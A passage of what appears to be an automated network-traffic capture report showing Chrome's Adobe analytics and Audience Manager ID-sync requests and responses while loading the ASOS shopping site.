                                                                                                                                                                                                                                                                  2024-10-29 19:11:24 UTC780OUTGET /id/rd?d_visid_ver=3.3.0&d_fieldgroup=MC&d_rtbd=json&d_ver=2&d_verify=1&d_orgid=C0137F6A52DEAFCC0A490D4C%40AdobeOrg&d_nsid=0&ts=1730229081200 HTTP/1.1
                                                                                                                                                                                                                                                                  Host: dpm.demdex.net
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                  Origin: https://www.asos.com
                                                                                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                  Referer: https://www.asos.com/
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                  Cookie: demdex=92169019881272936840057734661199256896
                                                                                                                                                                                                                                                                  2024-10-29 19:11:24 UTC817INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Date: Tue, 29 Oct 2024 19:11:24 GMT
                                                                                                                                                                                                                                                                  Content-Type: application/json;charset=utf-8
                                                                                                                                                                                                                                                                  Content-Length: 363
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  X-TID: ecDlctUURco=
                                                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                  Cache-Control: no-cache,no-store,must-revalidate,max-age=0,proxy-revalidate,no-transform,private
                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                  Expires: Thu, 01 Jan 1970 00:00:00 UTC
                                                                                                                                                                                                                                                                  P3P: policyref="/w3c/p3p.xml", CP="NOI NID CURa ADMa DEVa PSAa PSDa OUR SAMa BUS PUR COM NAV INT"
                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: https://www.asos.com
                                                                                                                                                                                                                                                                  Vary: Origin
                                                                                                                                                                                                                                                                  Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                  DCS: dcs-prod-irl1-2-v067-069c856af.edge-irl1.demdex.com 2 ms
                                                                                                                                                                                                                                                                  set-cookie: demdex=92169019881272936840057734661199256896; Max-Age=15552000; Expires=Sun, 27 Apr 2025 19:11:24 GMT; Path=/; Domain=.demdex.net; Secure; SameSite=None
                                                                                                                                                                                                                                                                  2024-10-29 19:11:24 UTC363INData Raw: 7b 22 64 5f 6d 69 64 22 3a 22 39 31 38 38 39 37 37 32 35 30 37 36 32 38 32 37 33 32 30 30 30 34 35 35 34 37 30 32 38 32 34 36 34 34 34 39 34 30 22 2c 22 69 64 5f 73 79 6e 63 5f 74 74 6c 22 3a 36 30 34 38 30 30 2c 22 64 5f 62 6c 6f 62 22 3a 22 52 4b 68 70 52 7a 38 6b 72 67 32 74 4c 4f 36 70 67 75 58 57 70 35 6f 6c 6b 41 63 55 6e 69 51 59 50 48 61 4d 57 57 67 64 4a 33 78 7a 50 57 51 6d 64 6a 30 79 22 2c 22 64 63 73 5f 72 65 67 69 6f 6e 22 3a 36 2c 22 64 5f 6f 74 74 6c 22 3a 37 32 30 30 2c 22 69 62 73 22 3a 5b 7b 22 69 64 22 3a 22 34 31 31 22 2c 22 74 74 6c 22 3a 31 30 30 38 30 2c 22 74 61 67 22 3a 22 69 6d 67 22 2c 22 66 69 72 65 55 52 4c 53 79 6e 63 22 3a 31 2c 22 73 79 6e 63 4f 6e 50 61 67 65 22 3a 31 2c 22 75 72 6c 22 3a 5b 22 2f 2f 63 6d 2e 65 76 65 72
                                                                                                                                                                                                                                                                  Data Ascii: {"d_mid":"91889772507628273200045547028246444940","id_sync_ttl":604800,"d_blob":"RKhpRz8krg2tLO6pguXWp5olkAcUniQYPHaMWWgdJ3xzPWQmdj0y","dcs_region":6,"d_ottl":7200,"ibs":[{"id":"411","ttl":10080,"tag":"img","fireURLSync":1,"syncOnPage":1,"url":["//cm.ever


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  118192.168.2.164990454.171.192.424437056C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-10-29 19:11:25 UTC533OUTGET /id/rd?d_visid_ver=3.3.0&d_fieldgroup=MC&d_rtbd=json&d_ver=2&d_verify=1&d_orgid=C0137F6A52DEAFCC0A490D4C%40AdobeOrg&d_nsid=0&ts=1730229081200 HTTP/1.1
                                                                                                                                                                                                                                                                  Host: dpm.demdex.net
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                  Cookie: demdex=92169019881272936840057734661199256896
                                                                                                                                                                                                                                                                  2024-10-29 19:11:25 UTC712INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Date: Tue, 29 Oct 2024 19:11:25 GMT
                                                                                                                                                                                                                                                                  Content-Type: application/json;charset=utf-8
                                                                                                                                                                                                                                                                  Content-Length: 363
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  X-TID: XavBUx8AS3c=
                                                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                  Cache-Control: no-cache,no-store,must-revalidate,max-age=0,proxy-revalidate,no-transform,private
                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                  Expires: Thu, 01 Jan 1970 00:00:00 UTC
                                                                                                                                                                                                                                                                  P3P: policyref="/w3c/p3p.xml", CP="NOI NID CURa ADMa DEVa PSAa PSDa OUR SAMa BUS PUR COM NAV INT"
                                                                                                                                                                                                                                                                  DCS: dcs-prod-irl1-1-v067-09aebd3ae.edge-irl1.demdex.com 3 ms
                                                                                                                                                                                                                                                                  set-cookie: demdex=92169019881272936840057734661199256896; Max-Age=15552000; Expires=Sun, 27 Apr 2025 19:11:25 GMT; Path=/; Domain=.demdex.net; Secure; SameSite=None
                                                                                                                                                                                                                                                                  2024-10-29 19:11:25 UTC363INData Raw: 7b 22 64 5f 6d 69 64 22 3a 22 39 31 38 38 39 37 37 32 35 30 37 36 32 38 32 37 33 32 30 30 30 34 35 35 34 37 30 32 38 32 34 36 34 34 34 39 34 30 22 2c 22 69 64 5f 73 79 6e 63 5f 74 74 6c 22 3a 36 30 34 38 30 30 2c 22 64 5f 62 6c 6f 62 22 3a 22 52 4b 68 70 52 7a 38 6b 72 67 32 74 4c 4f 36 70 67 75 58 57 70 35 6f 6c 6b 41 63 55 6e 69 51 59 50 48 61 4d 57 57 67 64 4a 33 78 7a 50 57 51 6d 64 6a 30 79 22 2c 22 64 63 73 5f 72 65 67 69 6f 6e 22 3a 36 2c 22 64 5f 6f 74 74 6c 22 3a 37 32 30 30 2c 22 69 62 73 22 3a 5b 7b 22 69 64 22 3a 22 34 31 31 22 2c 22 74 74 6c 22 3a 31 30 30 38 30 2c 22 74 61 67 22 3a 22 69 6d 67 22 2c 22 66 69 72 65 55 52 4c 53 79 6e 63 22 3a 31 2c 22 73 79 6e 63 4f 6e 50 61 67 65 22 3a 31 2c 22 75 72 6c 22 3a 5b 22 2f 2f 63 6d 2e 65 76 65 72
                                                                                                                                                                                                                                                                  Data Ascii: {"d_mid":"91889772507628273200045547028246444940","id_sync_ttl":604800,"d_blob":"RKhpRz8krg2tLO6pguXWp5olkAcUniQYPHaMWWgdJ3xzPWQmdj0y","dcs_region":6,"d_ottl":7200,"ibs":[{"id":"411","ttl":10080,"tag":"img","fireURLSync":1,"syncOnPage":1,"url":["//cm.ever


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  119192.168.2.164990652.49.181.1184437056C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-10-29 19:11:25 UTC756OUTGET /dest5.html?d_nsid=undefined HTTP/1.1
                                                                                                                                                                                                                                                                  Host: asos.demdex.net
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                  Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: iframe
                                                                                                                                                                                                                                                                  Referer: https://www.asos.com/
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                  Cookie: demdex=92169019881272936840057734661199256896
                                                                                                                                                                                                                                                                  2024-10-29 19:11:25 UTC607INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Date: Tue, 29 Oct 2024 19:11:25 GMT
                                                                                                                                                                                                                                                                  Content-Type: text/html;charset=UTF-8
                                                                                                                                                                                                                                                                  Content-Length: 6983
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  X-TID: tCbVdWoRQJ0=
                                                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                  Cache-Control: no-cache,no-store,must-revalidate,max-age=0,proxy-revalidate,no-transform,private
                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                  Expires: Thu, 01 Jan 1970 00:00:00 UTC
                                                                                                                                                                                                                                                                  P3P: policyref="/w3c/p3p.xml", CP="NOI NID CURa ADMa DEVa PSAa PSDa OUR SAMa BUS PUR COM NAV INT"
                                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                                  last-modified: Wed, 16 Oct 2024 09:35:36 GMT
                                                                                                                                                                                                                                                                  DCS: dcs-prod-irl1-2-v067-0c64cc5bf.edge-irl1.demdex.com 1 ms
                                                                                                                                                                                                                                                                  2024-10-29 19:11:25 UTC6983INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 6c 6f 6f 73 65 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 41 64 6f 62 65 20 41 75 64 69 65 6e 63 65 4d 61 6e 61 67 65 72 3c 2f 74 69 74 6c 65 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73
                                                                                                                                                                                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html lang="en-US"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><title>Adobe AudienceManager</title><script type="text/javas


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  120192.168.2.164990563.140.62.174437056C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-10-29 19:11:25 UTC2265OUTGET /id?d_visid_ver=3.3.0&d_fieldgroup=A&mcorgid=C0137F6A52DEAFCC0A490D4C%40AdobeOrg&mid=91889772507628273200045547028246444940&ts=1730229083403 HTTP/1.1
                                                                                                                                                                                                                                                                  Host: metrics.asos.com
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                  Origin: https://www.asos.com
                                                                                                                                                                                                                                                                  Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                  Referer: https://www.asos.com/
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                  Cookie: geocountry=US; _abck=14F88662DEAECFC12E5FBD09ED921080~-1~YAAQF/AQAs2QNNOSAQAATIew2QwLKpeecCv+v97MlQZhNB4zNJSrIoxbm41VbKTvv+RzKaSqjUqjvvAM63+avI+Pn+4ye0Up0agJfaW5eNR5+6jzr6ljrC0nrcotLSItqPr8I/QAyO1lnlbqO+ZhX8m5eovDNNS1xAp3takJjXCYswpl3hSR7m/i5otKqh7EIO4457xlWDiLDU4ruUPb6FFDcpjs9FrLl6wBlkCIGS71bVHyBgxXvPoddb5LXtxnB65mK92UpcAN9NnzYofW7ai8Yd88uu/vHdRtPPpGBzBYzBi4VpqUD+Sam5jhEi7zFt8ogiF8MdjeLoArVUyeMRkqVYYZK5/K5cUfURpI/WUbNZ2tUnuxJjZ4z2HK+eIhEjV7cCoFQ/bPc0XzcP4ngMameIhby/fyxWua~-1~-1~-1; bm_sz=C6560B727C2E1BF7EC11CF61B16D1E2E~YAAQF/AQAs6QNNOSAQAATIew2RkiZ/ZFgWnTEcjtF1YaHy4fTiDqA4YcAxn5LnPjd6nAu6Q8tI4u6cQ8aUQpwDx52fWnmHn7LhdnQYo16QT3VxROCl0UacXgIO6TElARdeB3WlPOPtcSTCqfZiioRMdAPSc/e7pRvfJ8Gn5PQfQTKJKIbExIKndW3WhD8WYCqneLiW+SD6digNqWAZXhXB39PnjIiLQZtCsOLnFIPAJpTXop0cW+dff89Q24Q/es+IM8boOQqu3n7toc0jHhG0aXEHo2SHvvOdsVLISJ6tZimh2dhEwu/aI6e0gvNy5uv0WlhzhgynlnlV2lvgg9acPb+jW1f7KuRTVGjhVyV+HGMnJTJj8kAaCzzjv0H0X3Doo=~4404018~4337977; s_pers=%20eVar225%3D1%7C1730230881209%3B%20s_vnum%3D1730433600214%2526vn%253D1%7C17 [TRUNCATED]
                                                                                                                                                                                                                                                                  2024-10-29 19:11:25 UTC666INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  access-control-allow-origin: https://www.asos.com
                                                                                                                                                                                                                                                                  access-control-allow-credentials: true
                                                                                                                                                                                                                                                                  date: Tue, 29 Oct 2024 19:11:25 GMT
                                                                                                                                                                                                                                                                  p3p: CP="This is not a P3P policy"
                                                                                                                                                                                                                                                                  server: jag
                                                                                                                                                                                                                                                                  set-cookie: s_ecid=MCMID%7C91889772507628273200045547028246444940; Path=/; Domain=asos.com; Max-Age=63072000; Expires=Thu, 29 Oct 2026 19:11:11 GMT; SameSite=Lax;
                                                                                                                                                                                                                                                                  vary: Origin
                                                                                                                                                                                                                                                                  content-type: application/x-javascript;charset=utf-8
                                                                                                                                                                                                                                                                  content-length: 48
                                                                                                                                                                                                                                                                  strict-transport-security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                  cache-control: no-cache, no-store, max-age=0, no-transform, private
                                                                                                                                                                                                                                                                  x-xss-protection: 1; mode=block
                                                                                                                                                                                                                                                                  x-content-type-options: nosniff
                                                                                                                                                                                                                                                                  connection: close
                                                                                                                                                                                                                                                                  2024-10-29 19:11:25 UTC48INData Raw: 7b 22 6d 69 64 22 3a 22 39 31 38 38 39 37 37 32 35 30 37 36 32 38 32 37 33 32 30 30 30 34 35 35 34 37 30 32 38 32 34 36 34 34 34 39 34 30 22 7d
                                                                                                                                                                                                                                                                  Data Ascii: {"mid":"91889772507628273200045547028246444940"}


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  121192.168.2.164991663.140.62.174437056C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-10-29 19:11:26 UTC2089OUTGET /id?d_visid_ver=3.3.0&d_fieldgroup=A&mcorgid=C0137F6A52DEAFCC0A490D4C%40AdobeOrg&mid=91889772507628273200045547028246444940&ts=1730229083403 HTTP/1.1
                                                                                                                                                                                                                                                                  Host: metrics.asos.com
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                  Cookie: geocountry=US; _abck=14F88662DEAECFC12E5FBD09ED921080~-1~YAAQF/AQAs2QNNOSAQAATIew2QwLKpeecCv+v97MlQZhNB4zNJSrIoxbm41VbKTvv+RzKaSqjUqjvvAM63+avI+Pn+4ye0Up0agJfaW5eNR5+6jzr6ljrC0nrcotLSItqPr8I/QAyO1lnlbqO+ZhX8m5eovDNNS1xAp3takJjXCYswpl3hSR7m/i5otKqh7EIO4457xlWDiLDU4ruUPb6FFDcpjs9FrLl6wBlkCIGS71bVHyBgxXvPoddb5LXtxnB65mK92UpcAN9NnzYofW7ai8Yd88uu/vHdRtPPpGBzBYzBi4VpqUD+Sam5jhEi7zFt8ogiF8MdjeLoArVUyeMRkqVYYZK5/K5cUfURpI/WUbNZ2tUnuxJjZ4z2HK+eIhEjV7cCoFQ/bPc0XzcP4ngMameIhby/fyxWua~-1~-1~-1; bm_sz=C6560B727C2E1BF7EC11CF61B16D1E2E~YAAQF/AQAs6QNNOSAQAATIew2RkiZ/ZFgWnTEcjtF1YaHy4fTiDqA4YcAxn5LnPjd6nAu6Q8tI4u6cQ8aUQpwDx52fWnmHn7LhdnQYo16QT3VxROCl0UacXgIO6TElARdeB3WlPOPtcSTCqfZiioRMdAPSc/e7pRvfJ8Gn5PQfQTKJKIbExIKndW3WhD8WYCqneLiW+SD6digNqWAZXhXB39PnjIiLQZtCsOLnFIPAJpTXop0cW+dff89Q24Q/es+IM8boOQqu3n7toc0jHhG0aXEHo2SHvvOdsVLISJ6tZimh2dhEwu/aI6e0gvNy5uv0WlhzhgynlnlV2lvgg9acPb+jW1f7KuRTVGjhVyV+HGMnJTJj8kAaCzzjv0H0X3Doo=~4404018~4337977; s_pers=%20eVar225%3D1%7C1730230881209%3B%20s_vnum%3D1730433600214%2526vn%253D1%7C17 [TRUNCATED]
                                                                                                                                                                                                                                                                  2024-10-29 19:11:26 UTC607INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                                                  date: Tue, 29 Oct 2024 19:11:26 GMT
                                                                                                                                                                                                                                                                  p3p: CP="This is not a P3P policy"
                                                                                                                                                                                                                                                                  server: jag
                                                                                                                                                                                                                                                                  set-cookie: s_ecid=MCMID%7C91889772507628273200045547028246444940; Path=/; Domain=asos.com; Max-Age=63072000; Expires=Thu, 29 Oct 2026 19:11:11 GMT; SameSite=Lax;
                                                                                                                                                                                                                                                                  vary: Origin
                                                                                                                                                                                                                                                                  content-type: application/x-javascript;charset=utf-8
                                                                                                                                                                                                                                                                  content-length: 48
                                                                                                                                                                                                                                                                  strict-transport-security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                  cache-control: no-cache, no-store, max-age=0, no-transform, private
                                                                                                                                                                                                                                                                  x-xss-protection: 1; mode=block
                                                                                                                                                                                                                                                                  x-content-type-options: nosniff
                                                                                                                                                                                                                                                                  connection: close
                                                                                                                                                                                                                                                                  2024-10-29 19:11:26 UTC48INData Raw: 7b 22 6d 69 64 22 3a 22 39 31 38 38 39 37 37 32 35 30 37 36 32 38 32 37 33 32 30 30 30 34 35 35 34 37 30 32 38 32 34 36 34 34 34 39 34 30 22 7d
                                                                                                                                                                                                                                                                  Data Ascii: {"mid":"91889772507628273200045547028246444940"}


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  122192.168.2.164991554.194.45.2274437056C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-10-29 19:11:26 UTC872OUTGET /id?d_visid_ver=3.3.0&d_fieldgroup=AAM&d_rtbd=json&d_ver=2&d_orgid=C0137F6A52DEAFCC0A490D4C%40AdobeOrg&d_nsid=0&d_mid=91889772507628273200045547028246444940&d_blob=RKhpRz8krg2tLO6pguXWp5olkAcUniQYPHaMWWgdJ3xzPWQmdj0y&ts=1730229084675 HTTP/1.1
                                                                                                                                                                                                                                                                  Host: dpm.demdex.net
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                  Origin: https://www.asos.com
                                                                                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                  Referer: https://www.asos.com/
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                  Cookie: demdex=92169019881272936840057734661199256896
                                                                                                                                                                                                                                                                  2024-10-29 19:11:26 UTC817INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Date: Tue, 29 Oct 2024 19:11:26 GMT
                                                                                                                                                                                                                                                                  Content-Type: application/json;charset=utf-8
                                                                                                                                                                                                                                                                  Content-Length: 363
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  X-TID: uujKUAtyTFo=
                                                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                  Cache-Control: no-cache,no-store,must-revalidate,max-age=0,proxy-revalidate,no-transform,private
                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                  Expires: Thu, 01 Jan 1970 00:00:00 UTC
                                                                                                                                                                                                                                                                  P3P: policyref="/w3c/p3p.xml", CP="NOI NID CURa ADMa DEVa PSAa PSDa OUR SAMa BUS PUR COM NAV INT"
                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: https://www.asos.com
                                                                                                                                                                                                                                                                  Vary: Origin
                                                                                                                                                                                                                                                                  Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                  DCS: dcs-prod-irl1-2-v067-06990a522.edge-irl1.demdex.com 2 ms
                                                                                                                                                                                                                                                                  set-cookie: demdex=92169019881272936840057734661199256896; Max-Age=15552000; Expires=Sun, 27 Apr 2025 19:11:26 GMT; Path=/; Domain=.demdex.net; Secure; SameSite=None
                                                                                                                                                                                                                                                                  2024-10-29 19:11:26 UTC363INData Raw: 7b 22 64 5f 6d 69 64 22 3a 22 39 31 38 38 39 37 37 32 35 30 37 36 32 38 32 37 33 32 30 30 30 34 35 35 34 37 30 32 38 32 34 36 34 34 34 39 34 30 22 2c 22 69 64 5f 73 79 6e 63 5f 74 74 6c 22 3a 36 30 34 38 30 30 2c 22 64 5f 62 6c 6f 62 22 3a 22 52 4b 68 70 52 7a 38 6b 72 67 32 74 4c 4f 36 70 67 75 58 57 70 35 6f 6c 6b 41 63 55 6e 69 51 59 50 48 61 4d 57 57 67 64 4a 33 78 7a 50 57 51 6d 64 6a 30 79 22 2c 22 64 63 73 5f 72 65 67 69 6f 6e 22 3a 36 2c 22 64 5f 6f 74 74 6c 22 3a 37 32 30 30 2c 22 69 62 73 22 3a 5b 7b 22 69 64 22 3a 22 34 31 31 22 2c 22 74 74 6c 22 3a 31 30 30 38 30 2c 22 74 61 67 22 3a 22 69 6d 67 22 2c 22 66 69 72 65 55 52 4c 53 79 6e 63 22 3a 31 2c 22 73 79 6e 63 4f 6e 50 61 67 65 22 3a 31 2c 22 75 72 6c 22 3a 5b 22 2f 2f 63 6d 2e 65 76 65 72
                                                                                                                                                                                                                                                                  Data Ascii: {"d_mid":"91889772507628273200045547028246444940","id_sync_ttl":604800,"d_blob":"RKhpRz8krg2tLO6pguXWp5olkAcUniQYPHaMWWgdJ3xzPWQmdj0y","dcs_region":6,"d_ottl":7200,"ibs":[{"id":"411","ttl":10080,"tag":"img","fireURLSync":1,"syncOnPage":1,"url":["//cm.ever


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  123192.168.2.164992454.171.192.424437056C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-10-29 19:11:27 UTC625OUTGET /id?d_visid_ver=3.3.0&d_fieldgroup=AAM&d_rtbd=json&d_ver=2&d_orgid=C0137F6A52DEAFCC0A490D4C%40AdobeOrg&d_nsid=0&d_mid=91889772507628273200045547028246444940&d_blob=RKhpRz8krg2tLO6pguXWp5olkAcUniQYPHaMWWgdJ3xzPWQmdj0y&ts=1730229084675 HTTP/1.1
                                                                                                                                                                                                                                                                  Host: dpm.demdex.net
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                  Cookie: demdex=92169019881272936840057734661199256896
                                                                                                                                                                                                                                                                  2024-10-29 19:11:28 UTC712INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Date: Tue, 29 Oct 2024 19:11:27 GMT
                                                                                                                                                                                                                                                                  Content-Type: application/json;charset=utf-8
